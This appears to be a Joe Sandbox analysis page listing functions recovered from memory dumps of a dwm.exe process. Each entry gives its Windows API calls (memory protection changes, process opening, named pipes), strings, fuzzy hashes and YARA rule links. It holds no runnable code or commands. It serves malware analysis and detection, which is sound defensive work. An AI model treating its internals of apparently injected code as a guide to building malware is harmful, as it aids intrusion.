Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 92406344f6521794ac91242a58e91ca1bffece9981872e9a3fb355ce4d911971
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 6102C632219B94C6EB608B55E49835AB7B0F385794F504115EA8E87FA8DB7EC598CF00

Function 00000262F1DF2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000262F1DF2AE1
TlsGetValue.KERNEL32 ref: 00000262F1DF2AF0
TlsGetValue.KERNEL32 ref: 00000262F1DF2AFF
TlsSetValue.KERNEL32 ref: 00000262F1DF2C3B
TlsSetValue.KERNEL32 ref: 00000262F1DF2C4A
TlsSetValue.KERNEL32 ref: 00000262F1DF2C59

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 65d062dcc2678e32cc844d1d847d279685c448c3aecce38d77328a468b13f347
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 50516E36214E65C7E728CF26A84C65AB3B1F788B84F90411DDE5A53F58DF3ADA49CB00

Function 00000262F1DF5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000262F1DF5E66

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 90c825e220dd39dd9c3319960f274b2e90d8dd515f8614c33c7735deaf36e318
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: EB61A336529E94C6E7648F15E45C71AB7B4F388748F904116FA8E87FA8DB7AC648CF00

Function 00000262F1DF3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000262F1DF3A5B), ref: 00000262F1DF3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1DF3A5B), ref: 00000262F1DF3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000262F1DF3A5B), ref: 00000262F1DF3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1DF3A5B), ref: 00000262F1DF3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000262F1DF3A5B), ref: 00000262F1DF3F68

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 5cc8f2eb411d0b4343f6501bf08eb86cf89b31ae9cbe0c75fe8bcf3bc290a203
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 8A113D36605B50D3EB24CB21F40C21AA7B0FF45B80F854126DE8D07BA4EB7ECA58CB84

Function 00000262F1DC9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000262F1DC9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000262F1DC9FBC

Strings

csm, xrefs: 00000262F1DCA00E
csm, xrefs: 00000262F1DC9EF6

Memory Dump Source

Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 45197141dea0fdbc2dc789ccba534068671fe345acb138f35142295ed4ef596a
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: F9519D33204BA1CAEB788F22A14C35877B0F354BD8F984916DA8947FD9DB3AC458DB01

Function 00000262F1DFA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000262F1DFA75B
_CallSETranslator.LIBVCRUNTIME ref: 00000262F1DFA7A7

Strings

MOC, xrefs: 00000262F1DFA76F
RCC, xrefs: 00000262F1DFA777

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: cff8e054d45727210f342f56c6f130d4c2d6b4d6bc712633baea4b7e334805f1
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: A161AC32508BC4C6EB248F15E44879AB7B0F785B98F848215EF9813F99DB7DC298CB00

Function 00000262F1DFAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000262F1DFAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000262F1DFABBC

Strings

csm, xrefs: 00000262F1DFAC0E
csm, xrefs: 00000262F1DFAAF6

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: d0ede950576c549fa59b874e259b4a4ce2916a0af2a89e7bd1f7dc29efb66418
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: C2519F36200BA4CBEB788F22D54C35877B1F754B98F948116DA9947FD5CB3ACA68CB01

Function 00000262F1DF3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 00000262F1DF3972
StrStrW.SHLWAPI ref: 00000262F1DF3990
StrToIntW.SHLWAPI ref: 00000262F1DF39B7

Part of subcall function 00000262F1DF1A30: OpenProcess.KERNEL32 ref: 00000262F1DF1A56
Part of subcall function 00000262F1DF1A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000262F1DF1A74
Part of subcall function 00000262F1DF1A30: PathFindFileNameW.SHLWAPI ref: 00000262F1DF1A83
Part of subcall function 00000262F1DF1A30: lstrlenW.KERNEL32 ref: 00000262F1DF1A8F
Part of subcall function 00000262F1DF1A30: StrCpyW.SHLWAPI ref: 00000262F1DF1AA2
Part of subcall function 00000262F1DF1A30: CloseHandle.KERNEL32 ref: 00000262F1DF1AB0

Part of subcall function 00000262F1DF3F88: StrCmpNIW.SHLWAPI(?,?,?,00000262F1DF272F), ref: 00000262F1DF3FA0

Strings

pid_, xrefs: 00000262F1DF3968

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: e1107612ec29285105f426af2682408a23f5990602284a2c2e3475d3decf5783
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 2B115171314FA1E2EB109B36E80C35A67B4FB84780FD54125EE4987E98EF6ACA4DC700

Function 00000262F1E01FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000262F1E02027
WriteFile.KERNEL32 ref: 00000262F1E02304
WriteFile.KERNEL32 ref: 00000262F1E0234A
GetLastError.KERNEL32 ref: 00000262F1E02409

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: fab21034f37749d0764c7a094826087ce2baf9ef234d4ae925340f48f693a9dc
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 5FD1CC32B14AA5C9E711CFA9D4482DC3BB1F354B98F84421ADF5DA7F99DA36C50AC340

Function 00000262F1E028F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000262F1E028DF), ref: 00000262F1E02A12

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: aa50052e892c755e89d0f4316aac242c37ea8d177f6c047af74f619aae85348e
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 4D91CF32610E72C9FB648F65949C3AD2BF0F759F98FC8410ADE4A67E85DA36C489C700

Function 00000262F1DF27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000262F1DF28CC
StrCpyW.SHLWAPI ref: 00000262F1DF28E5

Part of subcall function 00000262F1DF3F88: StrCmpNIW.SHLWAPI(?,?,?,00000262F1DF272F), ref: 00000262F1DF3FA0

Strings

\\.\pipe\, xrefs: 00000262F1DF28D7

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 4df9a9dadee2755cd8d95746c49c9ca14734ed879e3710f7773d6d88bc73d5a6
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: EF718E36200FA2C2EB749E66985C3AA77B4F395BC4F85401ADD4A57F89DA36CB4CC740

Function 00000262F1DC80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000262F1DC80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000262F1DC8162

Strings

csm, xrefs: 00000262F1DC8149

Memory Dump Source

Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 4911c39bb0ee4098dd60656a026204a0110c7ad6f1277901effdb21ea04660d3
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 7F51B432311E20CADB54CF56E44CF6D73B2F394B98F958A25DA4647B88D77AD849C700

Function 00000262F1DC9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000262F1DC9BA7

Strings

RCC, xrefs: 00000262F1DC9B77
MOC, xrefs: 00000262F1DC9B6F

Memory Dump Source

Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 557a6789f5187bc5074069dbd349a370ffa854fa06ce06f849a716dfe5d322b7
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 3761CD72508FC4C2EB358F19E44879AB7B0F785B88F844A15EB9813F99CB79C098CB00

Function 00000262F1DF25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000262F1DF26C2
StrCpyW.SHLWAPI ref: 00000262F1DF26D9

Strings

\\.\pipe\, xrefs: 00000262F1DF26CD

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 77e7a4369789b78505a750bb74a9998a2519af63b9d4ac8f247581a78fb1a9d9
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 0B51E136208FA1D1EE24DE2AA45C3AA67B1F795B90FC50029DE5943F99DB3BC60CC740

Function 00000262F1E02660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000262F1E02778
GetLastError.KERNEL32 ref: 00000262F1E0279D

Strings

U, xrefs: 00000262F1E02722

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 5807687a0749368f9fc8b5a9b7756883f5ade9cd1dba01989b1759afd8963555
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 5641B232625EA1C6EB60CF65E44C79AA7B0F388B94FC44125EE4D87F58EB39C449CB40

Function 00000262F1DF9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000262F1DF91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000262F1DF87F7), ref: 00000262F1DF9209

Strings

csm, xrefs: 00000262F1DF91F6

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 1cf7644179d68b3ffb39a7e968ddda197dd02b7a467be2fbdcf623f8a8e87045
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 7B115B32614F9082EB248F15F418249B7F1FB88B88F984225EE8D07B68DF3DC655CB00

Function 00000262F1DF1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000262F1DF1D69
HeapAlloc.KERNEL32 ref: 00000262F1DF1D77
GetProcessHeap.KERNEL32 ref: 00000262F1DF1D9C
HeapFree.KERNEL32 ref: 00000262F1DF1DAA

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: b3efab4190b7abe3c3269f8cce79560c780198ad7ed2a5cb25c70f9bcf6bc0b6
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: CE118031A01F90C5EA14DB6AA80C25977F4FB88FD0F984124DE4E53B65EF39D546C700

Function 00000262F1DF1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000262F1DF126A
HeapAlloc.KERNEL32 ref: 00000262F1DF1279
GetProcessHeap.KERNEL32 ref: 00000262F1DF1293
HeapAlloc.KERNEL32 ref: 00000262F1DF12A4

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 1e133ff160d67c75a1e658c810bb067d0606d2ae022ef74b82297dd88762e49b
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 62E03231A01E14DAE7288B62D80C36936E1EB8CF05F888024CD0907B60EF7E849D8B80

Function 00000262F1DF1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000262F1DF1006
HeapAlloc.KERNEL32 ref: 00000262F1DF1015
GetProcessHeap.KERNEL32 ref: 00000262F1DF1028
HeapAlloc.KERNEL32 ref: 00000262F1DF1037

Memory Dump Source

Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true

Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: adec290430aa535978ac7d52b76ae94b686b2f6104f9958c4eb5500b4e524a32
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 7CE0E571611E14EAE7289B62D80C26976F1FF8CF15FC88064CD0907B20EE3A849D9A10

